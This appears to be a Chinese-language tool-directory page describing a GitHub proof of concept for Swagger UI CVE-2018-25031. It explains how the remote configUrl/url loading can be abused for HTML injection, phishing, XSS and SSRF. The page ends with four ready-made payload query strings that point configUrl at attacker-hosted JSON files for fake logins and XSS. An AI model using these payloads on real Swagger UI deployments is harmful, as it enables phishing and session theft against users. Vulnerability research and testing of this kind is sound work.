Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) 概念验证,[HTML注入,跨站脚本]。 | Kitploit
工具/GitHubGitHub/relichunt3r/swagger-ui
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) 概念验证,[HTML注入,跨站脚本]。

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

引言:Swagger UI 的作用

Swagger UI 是一个广泛使用的库,它能将 OpenAPI(原 Swagger)规范渲染为交互式 Web 界面。开发者与集成人员无需后端实现即可探索和测试 API。

CVE‑2018‑25031 详情

根本原因:远程规范加载

该漏洞源于 Swagger UI 客户端对用于加载远程配置或规范文件的 URL 查询参数验证不足。涉及的常见参数包括:

  • ?url=.yaml
  • ?configUrl=.json

攻击者可将这些参数指向一个攻击者控制的、远程托管的 OpenAPI 定义或配置文件,该文件可能被易受攻击的实例渲染。

潜在攻击向量

根据托管配置与防护措施的不同,加载恶意远程文件可能导致多种高影响力的后果:

  1. HTML注入(HTMLi) / 钓鱼 - 注入的文件可包含任意 HTML,视觉上伪造内容(例如虚假登录表单),滥用自托管实例的可信域名。
  2. 跨站脚本(XSS) - 若注入内容包含可执行 JavaScript,可导致 DOM XSS,进而窃取会话或代表用户执行操作。
  3. 服务器端请求伪造(SSRF) - 当服务器代客户端获取远程规范时,攻击者可能迫使服务器向内部端点发起请求,从而暴露敏感资源。

参考资料:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

概念验证 (POC)

Payloads

1 - Login

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - Remote Login

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - Image

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 免责声明

本仓库中的内容仅供教育和信息目的提供。作者对任何滥用行为概不负责。使用前请确保获得适当授权,自行承担风险并遵守所有法律与道德准则。

下载工具